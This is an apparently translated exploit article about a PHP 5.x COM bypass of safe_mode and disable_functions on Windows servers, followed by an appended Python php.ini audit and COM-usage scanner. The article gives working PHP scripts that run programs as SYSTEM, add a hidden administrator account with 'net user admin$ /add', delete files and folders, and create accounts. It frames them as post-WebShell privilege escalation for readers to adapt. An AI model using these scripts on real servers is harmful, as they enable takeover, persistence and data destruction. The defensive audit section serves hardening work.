PHP 5.x COM functions privilege escalation vulnerability - vulnerability warning - the black bar safety net

ID MYHACK58:62201132150
Type myhack58
Reporter Anonymous
Modified 2011-10-26T00:00:00


PHP, an acronym for "Hypertext Preprocessor", is an HTML-embedded language. It can produce dynamic web pages faster than CGI or Perl. PHP is very powerful: everything CGI or JavaScript can do, PHP can do as well, and it supports almost all popular databases and operating systems. But a language this powerful and this widely used has a serious vulnerability: the PHP 5.x COM functions safe_mode and disable_functions bypass vulnerability. With it, privilege escalation, which many people can only dream of, becomes achievable. Below I first give an overall introduction to the vulnerability; my level is limited, so please forgive any inaccuracies.

The COM functions used by the vulnerability exist only in PHP on Windows (.NET support requires PHP 5 and the .NET Runtime). The functions involved need no special installation; they are part of the PHP core. PHP on Windows supports these extensions by default, so no additional extension has to be loaded to call the vulnerable functions. Nowadays many medium and large sites like to be built on PHP+Apache+Windows, and in that case the attack surface of this PHP vulnerability is very large; especially now that privilege escalation is getting harder and harder, I think a lot of servers will fall because of this vulnerability.

According to what the vulnerability's discoverer published, exploiting it requires the following settings in php.ini. My test environment is PHP 5.2.3 + Apache 2.2.3 + Windows XP SP2; in my tests I found that this exact configuration is not strictly required, so you can test it yourself and see.

safe_mode = On
disable_functions = com_load_typelib
open_basedir = htdocs

Below we look at the content and use of the vulnerability one item at a time.

RunApplication function in compatUI.dll

The test code for this exploit is as follows.

<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}'); // load compatUI.dll
$compatUI->RunApplication("something", "notepad.exe", 1); // run Notepad
?>

Save it as a PHP file, put it on the server, and then open it with IE. After it runs, IE shows nothing, as in Figure 1, but Notepad is in fact already running, and with SYSTEM permissions: because it is started by the system service, it inherits SYSTEM privileges, as shown in Figure 2.



Using this vulnerability we can run a Trojan that has already been uploaded, achieving privilege escalation from the WebShell. Of course, if you are bored enough, you can also put it in a loop and make the server run a large number of Notepad instances, achieving a DoS.

Wscript Run command

The test code for this exploit is as follows.

<?php
$wscript = new COM('wscript.shell'); // wscript.exe is needed
$wscript->Run("cmd.exe /c calc.exe"); // run calc.exe
?>

After accessing the script, a calc.exe process with SYSTEM permissions appears on the server, as shown in Figure 3. With a little imagination you can modify the script to add an administrator account; the specific code is as follows.


<?php
$wscript = new COM('wscript.shell');
$wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>

After accessing the script, the administrator account is added successfully; with SYSTEM permissions this is a nightmare, as shown in Figure 4.


OpenTextFile in wshom.ocx

OpenTextFile can be used to create a file. The test code for the vulnerability in it is as follows.

<?php
$mPath = str_repeat("..\\", 20);
$FSO = new COM('Scripting.FileSystemObject'); // uses wshom.ocx
$FSO->OpenTextFile($mPath."bat.bat", 8, true); // creates a file on the server: although this function opens a file, it creates the file when it does not exist
?>

Sure enough, the batch file bat.bat appears in the root directory of drive C, as shown in Figure 5.


DeleteFile in wshom.ocx

This function can delete files on the server, so we must be careful when testing it. The test code is below.

<?php
$mPath = str_repeat("..\\", 20);
$FSOdelFile = new COM('Scripting.FileSystemObject'); // uses wshom.ocx
$FSOdelFile->DeleteFile($mPath.".\\*.dat", True); // delete all .dat files in the root directory of drive C
?>

DeleteFolder in wshom.ocx

With this function you can delete folders on the server, which is horrifying. The test code is as follows:

<?php
$mPath = str_repeat("..\\", 20);
$FSOdelFolder = new COM('Scripting.FileSystemObject'); // uses wshom.ocx
$FSOdelFolder->DeleteFolder($mPath.".\\11", True); // delete a specific folder
?>

After accessing it, the folder c:\11 was successfully deleted.

Create function in shgina.dll for creating an account

The test code for this exploit is as follows:

<?php
$user = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); // uses shgina.dll
$user->Create("asd"); // create the account asd
?>

Note, however, that the account created with this vulnerability only belongs to the Users group, as shown in Figure 6.


That concludes the introduction to PHP 5.x COM function exploits. The test code is provided with the text, and everyone can make the appropriate modifications according to their own needs. But let me remind everyone: the premise of the exploits above is that we already have a WebShell, and only then can the privilege escalation script be uploaded. Remember that!
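The whole article turns on one point: the php.ini settings it names (safe_mode, disable_functions, open_basedir) restrict functions and paths, but `new COM(...)` is a class instantiation and none of them block it. The following is an added defender-side example, not code from the article or its author: a small Python checker that (1) audits php.ini text for the directive that does block it, `disable_classes` (and reports `com.allow_dcom`), and (2) scans PHP source for instantiation of the COM objects this article uses, so uploaded files can be triaged. The CLSIDs and ProgIDs in `COM_INDICATORS` are the ones printed in the article; the php.ini and PHP samples are constructed for the example.

```python
import re

# Indicators taken from the article's test scripts (CLSIDs and ProgIDs,
# lower-cased), mapped to what each object lets a script do as the web server.
COM_INDICATORS = {
    "{0355854a-7f23-47e2-b7c3-97ee8dd42cd8}": "compatUI.dll RunApplication: process execution",
    "wscript.shell": "WScript.Shell Run: command execution",
    "scripting.filesystemobject": "FileSystemObject (wshom.ocx): file create/delete",
    "{60664caf-af0d-0004-a300-5c7d25ff22a0}": "shgina.dll Create: local account creation",
}

# Matches `new COM('...')` / `new COM("...")`, tolerating odd spacing.
NEW_COM_RE = re.compile(r"new\s+COM\s*\(\s*(['\"])(.*?)\1", re.IGNORECASE)


def parse_php_ini(text):
    """Minimal php.ini reader: `key = value` lines, ';' comments, [sections] skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit_php_ini(text):
    """Return a list of findings; an empty list means COM instantiation is blocked."""
    s = parse_php_ini(text)
    disabled = {c.strip().lower() for c in s.get("disable_classes", "").split(",") if c.strip()}
    findings = []
    if "com" not in disabled:
        # disable_functions (the setting the article's setup relies on) only
        # covers functions; `new COM()` instantiates a class and is unaffected.
        findings.append("disable_classes does not list COM: new COM(...) is still allowed")
    if s.get("com.allow_dcom", "0").lower() in ("1", "on", "true"):
        findings.append("com.allow_dcom is enabled: remote (DCOM) objects are also reachable")
    return findings


def scan_php_source(text):
    """Return (line_number, target, capability) for every `new COM(...)` found."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in NEW_COM_RE.finditer(line):
            # Normalise spacing such as 'wscript. shell' before the lookup.
            target = re.sub(r"\s+", "", m.group(2)).lower()
            capability = COM_INDICATORS.get(target, "unlisted COM object")
            hits.append((lineno, target, capability))
    return hits


# Constructed sample inputs (not taken from a real server).
WEAK_INI = """; the settings the article names
safe_mode = On
disable_functions = com_load_typelib
open_basedir = htdocs
"""

HARDENED_INI = """safe_mode = On
disable_functions = com_load_typelib
open_basedir = htdocs
disable_classes = COM, DOTNET
com.allow_dcom = 0
"""

SAMPLE_PHP = """<?php
$a = new COM('wscript. shell');
$b = new COM("Scripting.FileSystemObject");
$c = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
echo "hello";
?>
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit_php_ini(ini) or ["ok"])
    for lineno, target, cap in scan_php_source(SAMPLE_PHP):
        print(f"line {lineno}: {target} -> {cap}")
```

The weak configuration (exactly the three settings the article lists) produces one finding, the hardened one none; the source scanner reports lines 2, 3 and 4 of the sample with the capability each object grants. `disable_classes` is a standard php.ini directive, so adding `COM` (and `DOTNET`) to it on a Windows PHP host closes the instantiation path without touching `disable_functions`; the scanner is a triage aid for files found in upload directories, not a substitute for that setting.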